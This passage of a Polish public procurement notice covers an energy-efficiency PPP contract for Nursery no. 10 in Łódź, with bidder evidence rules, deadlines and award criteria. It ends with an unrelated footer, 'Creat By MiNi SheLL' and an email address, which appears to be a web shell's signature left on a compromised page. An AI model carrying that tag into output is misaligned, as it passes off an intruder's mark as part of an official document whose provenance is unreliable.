Wykonawca powołuje się na doświadczenie w realizacji usług/robót budowlanych, wykonywanych wspólnie z innymi Wykonawcami, wykaz usług/robót budowlanych, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>7.	Zamawiający zastrzega weryfikację potwierdzenia należytego wykonania prac bezpośrednio u podmiotu, na rzecz, którego były wykonane.<br/>8.	Przez „budynek użyteczności publicznej” rozumie się budynki zgodnie z definicją zawartą w § 3 pkt. 6) Rozporządzenie Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie. (t.j. Dz.U. 2022 poz. 1225).<br/>9.	Przez Sezon Grzewczy rozumie się okres, w którym warunki atmosferyczne powodują konieczność ciągłego dostarczania ciepła w celu ogrzewania obiektów.<br/>10.	Przez Zarządzanie Energią należy rozumieć wdrożenie i eksploatację systemu umożlwiającego monitorowanie i optymalizowanie zużycia energii cieplnej i elektrycznej w budynkach zmierzające do osiągnięcia gwarantowanych w umowie oszczędności w zużyciu energii cieplnej i elektrycznej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">[Numeracja zgodna z OPiW] 11.5 Podmiotowe środki dowodowe wymagane od Wykonawcy obejmują:<br/>11.5.1	Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w:<br/>11.5.1.1	art. 108 ust. 1 pkt 3 ustawy Pzp, dotyczących wydania prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne,<br/>11.5.1.2	art. 108 ust.1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego,<br/>11.5.1.3	art. 108 ust. 1 pkt 5 ustawy Pzp dotyczących zawarcia z innymi Wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>11.5.1.4	art. 108 ust. 1 pkt 6 ustawy Pzp. dotyczących zakłócenia konkurencji wynikającego z wcześniejszego zaangażowania Wykonawcy lub podmiotu, który należy z Wykonawcą do tej samej grupy kapitałowej, w przygotowanie postępowania o udzielenie zamówienia,<br/>11.5.1.5	art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz. U. z 2024 r. poz. 507 ze zm.).	<br/>W przypadku Wykonawców wspólnie ubiegających się o zamówienie oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu o którym mowa w art. 125 ust. 1 ustawy Pzp składa każdy z tych Wykonawców (dotyczy również wspólników spółki cywilnej).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">[Numeracja zgodna z OPiW] 11.3.4	Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.<br/>Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć dokumentów <br/>o których mowa w pkt. 11.3.4 OPiW, wykonawca składa inny dokument, który <br/>w wystarczający sposób potwierdzi spełnianie opisanego przez zamawiającego warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej lub finansowej.<br/>11.3.5	Wykaz robót budowlanych wykonanych (Załącznik nr 7 do OPiW) nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, wraz z załączeniem dowodów określających czy te roboty zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje, bądź inne dokumenty sporządzone przez podmiot, na rzecz, którego roboty budowlane zostały wykonane. Jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. <br/>Uwagi:<br/>1.	Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonywanych wspólnie z innymi Wykonawcami, wykaz o którym mowa w pkt. 11.3.5 OPiW dotyczy robót budowlanych, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>2.	Okres wyrażony w latach, o którym mowa powyżej liczy się wstecz od dnia, w którym upływa termin składania ofert.<br/>11.3.6	Wykaz usług (Załącznik nr 8 do OPiW) wykonanych a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje; bądź inne dokumenty sporządzone przez podmiot, na rzecz, którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane; a jeżeli Wykonawca nie jest w stanie uzyskać tych dokumentów z przyczyn niezależnych od niego – oświadczenie Wykonawcy. <br/> Uwagi:<br/>1.	W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych, referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny by wystawione w okresie ostatnich 3 miesięcy przed upływem terminu składania ofert.<br/>2.	Okres wyrażony w latach, o którym mowa powyżej liczy się wstecz od dnia, w którym upływa termin składania ofert.<br/>3.	Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie z innymi Wykonawcami, wykaz o którym mowa w pkt. 11.3.6 OPiW dotyczy usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> [Numeracja zgodna z OPiW] 13.1	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>13.2	Zamawiający w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia w odniesieniu do warunku sytuacji ekonomicznej lub finansowej oraz warunku zdolności technicznej lub zawodowej dopuszcza łączne spełnienie warunków przez Wykonawców.<br/>13.3	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp oraz art. 7 ust. 1 ustawy, natomiast spełnianie warunków udziału w postępowaniu Wykonawcy wykazują zgodnie z pkt. 10.1 OPiW.<br/>13.4	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w pkt. 11.3 OPiW, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>13.5	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty budowlane/usługi wykonają poszczególni Wykonawcy. <br/>13.6	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>13.7	Podmiotowe środki dowodowe, o których mowa w pkt 11.3.4-11.3.6 OPiW składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/wykazują spełnianie warunków zakresie i na zasadach opisanych w pkt 10.1 OPiW. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wzór umowy zostanie załączony do Specyfikacji Warunków Zamówienia <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-10 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć na Platformie pod adresem: https://uml.ezamawiajacy.pl. Po zalogowaniu się i przejściu do konkretnego postępowania Wykonawca wybiera kafelek „FORMULARZ OFERTY/WNIOSKU” lub wybiera sekcję „Przygotowanie oferty”</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-10 11:00</span></h3> <h3 class="mb-0">8.8.) Krótki opis minimalnych wymagań dotyczących przedmiotu zamówienia lub realizacji zamówienia, niepodlegających negocjacjom, które muszą spełnić wszystkie oferty: </h3> 5.1	Przedmiotem zamówienia jest przeprowadzenie kompleksowej modernizacji energetycznej obiektu użyteczności publicznej - Żłobka nr 10, znajdującego się w Łodzi przy ul. Karolewskiej 70/76, 94-023 Łódź (dalej również „Obiekt”) na podstawie umowy o poprawę efektywności energetycznej, będące jednocześnie przedsięwzięciem <br/>w rozumieniu art. 2 pkt 4) ustawy o PPP (dalej również: „Projekt”).<br/>5.2	Założeniem Zamawiającego jest wykonanie kompleksowej modernizacji energetycznej obiektu, w celu uzyskania następujących korzyści:<br/>5.2.1	osiągnięcia efektu energetycznego polegającego na obniżeniu poziomu zużycia energii elektrycznej i cieplnej, a w konsekwencji zmniejszenia bieżących kosztów utrzymania Obiektu;<br/>5.2.2	sfinansowania prac projektowych i robót budowlanych z wygenerowanych oszczędności finansowych spowodowanych zmniejszeniem zużycia energii w Obiekcie oraz ze środków pozyskanych przez Zamawiającego w ramach dofinansowania zewnętrznego;<br/>5.2.3	braku wpływu zobowiązań z tytułu realizacji zamówienia na państwowy dług publiczny oraz indywidulany wskaźnik zadłużenia;<br/>5.2.4	podniesienia standardu użytkowania Obiektu oraz jego estetyki.<br/>5.3	Zamawiający zakłada kompleksową realizację zamówienia przez wybranego Wykonawcę, którego zadaniem będzie:<br/>5.3.1	zapewnienie i poniesienie w całości nakładów finansowych na potrzeby realizacji Projektu;<br/>5.3.2	wykonanie niezbędnej dokumentacji projektowej w celu uzyskania decyzji i pozwoleń właściwych organów na przeprowadzenie niezbędnych prac oraz przeprowadzenie remontu/przebudowy Obiektu w określonym przez Zamawiającego zakresie (program funkcjonalno-użytkowy oraz audyt energetyczny), za wynagrodzeniem w postaci opłaty za dostępność;<br/>5.3.3	utrzymanie zmodernizowanej infrastruktury w okresie obowiązywania umowy oraz zarządzanie gospodarką energetyczną Obiektu poprzez wdrożenie zintegrowanego systemu sterowania w celu uzyskania zagwarantowanych w ofercie oszczędności w zużyciu energii elektrycznej i cieplnej;<br/>5.3.4	poniesienie większości ryzyk związanych z realizacją Projektu oraz uzależnienie wysokości wynagrodzenia od gwarancji dostępności przedmiotu partnerstwa oraz efektu energetycznego. <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> [Numeracja zgodna z OPiW] <br/>3.1.Postępowanie o udzielenie zamówienia publicznego prowadzone jest w trybie podstawowym z obligatoryjnymi negocjacjami na podstawie art. 275 pkt 3 ustawy Pzp w związku z art. 7 ustawy z dnia 20 maja 2016 r. o efektywności energetycznej (t.j. Dz. U. z 2024 r. poz. 1047)oraz art. 4 ust. 1 ustawy z dnia 19 grudnia 2008 r. o partnerstwie publiczno-prywatnym (t.j. Dz. U. z 2023 r. poz. 1637).<br/>3.2.W postępowaniu mają zastosowanie przepisy ustawy o efektywności energetycznej, ustawy o PPP, ustawy Pzp oraz aktów wykonawczych wydanych na jej podstawie. W zakresie nieuregulowanym przez ww. akty prawne stosuje się przepisy ustawy z dnia 23 kwietnia 1964 r. - Kodeks cywilny (t.j. Dz. U. z 2024 r. poz. 1061).<br/>8.Termin wykonania zamówienia: <br/>zakładany okres trwania umowy o zamówienie (dalej: „Umowa EPC”) wynosi do 12 lat (w tym maksymalnie 2 letni etap inwestycyjny i 10 lat etap utrzymania i zarządzania). Ostateczny okres trwania Umowy EPC zostanie określony w Specyfikacji Warunków Zamówienia na podstawie ustaleń poczynionych w toku negocjacji.<br/>24.1 Zamawiający dokona wyboru najkorzystniej oferty w oparciu o następujące kryteria oceny ofert: <br/>24.1.1	Kryterium 1: Cena<br/>Podstawą oceny ofert w kryterium cena będzie zaoferowana przez Wykonawcę cena ofertowa brutto za zamówienie.<br/>24.1.2	Kryterium 2: Poziom gwarantowanych oszczędności w zużyciu energii cieplnej i elektrycznej Zamawiający dokona oceny zaoferowanego przez Wykonawcę poziomu oszczędności w zużyciu energii cieplnej i elektrycznej jaki Wykonawca zobowiązuje się osiągnąć w wyniku realizacji Przedsięwzięcia obliczony za pomocą metodologii obliczania oszczędności.<br/>24.1.3	Kryterium 3: Podział zadań i ryzyk<br/>Zamawiający dokona oceny wybranych elementów Projektu oraz przyzna punktację w przypadku przejęcia przez Wykonawcę określonych zadań, ryzyk lub obowiązków.<br/>24.2	Określenie wag kryteriów udzielenia zamówienia oraz ich szczegółowy opis nie jest możliwy, ze względu na fakt, iż postępowanie obejmuje fazę negocjacji, która będzie dotyczyć wszelkich aspektów realizacji zamówienia. Dopiero w SWZ możliwe będzie wskazanie ew. podkryteriów i określenie wag poszczególnych kryteriów z przyczyn obiektywnych.<br/>29.1. Zamawiający przewiduje możliwość odbycia wizji lokalnej w dniu 26 maja 2025 r. w godzinach 10:00 – 13:00<br/>29.2. Wizja lokalna nie mają charakteru obowiązkowego, tylko realizowane będą na wniosek Wykonawcy. Wykonawcy mogą złożyć ofertę bez odbycia wizji lokalnej lub sprawdzenia dokumentów.<br/>37.1	Zamawiający nie przewiduje:<br/>36.1.1	zawarcia umowy ramowej<br/>36.1.2	składania ofert wariantowych i częściowych,<br/>36.1.3	rozliczania w walutach obcych,<br/>36.1.4	zwrotu kosztów udziału w postępowaniu,<br/>36.1.5	wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej,<br/>36.1.6	wymogu lub możliwości złożenia ofert w postaci katalogów elektronicznych lub dołączenia katalogów elektronicznych do oferty,<br/>36.1.7	udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp.<br/>36.1.9 możliwości skorzystania z prawa opcji na podstawie art. 441 ustawy Pzp<br/>37.2	Zamawiający przed wszczęciem postępowania przeprowadził wstępne konsultacje rynkowe.<br/>37.3	Zamawiający, stosownie do art. 7a ust 1 i 2 ustawy o PPP nie wyraża zgody na zawarcie i wykonanie umowy z zawiązaną po wyborze najkorzystniejszej oferty w celu realizacji przedsięwzięcia jednoosobową spółką partnera prywatnego albo spółką kapitałową, której jedynymi wspólnikami są partnerzy prywatni. Zamawiający informuje, że warunki stosowania art 10a ust 1 i 2 ustawy o PPP zostaną zawarte w projekcie Istotnych Postanowień Umowy będącym załącznikiem do przekazanej wraz z zaproszeniem do złożenia oferty Specyfikacji Warunków Zamówienia.<br/>37.4	W trakcie trwania postępowania niedopuszczalne są̨ zmiany podmiotowe po stronie Wykonawcy z wyjątkiem sukcesji uniwersalnej. Powyższy zakaz obejmuje również̇ zmiany podmiotowe w obrębie konsorcjum biorącego udział w postępowaniu po stronie Wykonawcy.

Creat By MiNi SheLL
Email: jattceo@gmail.com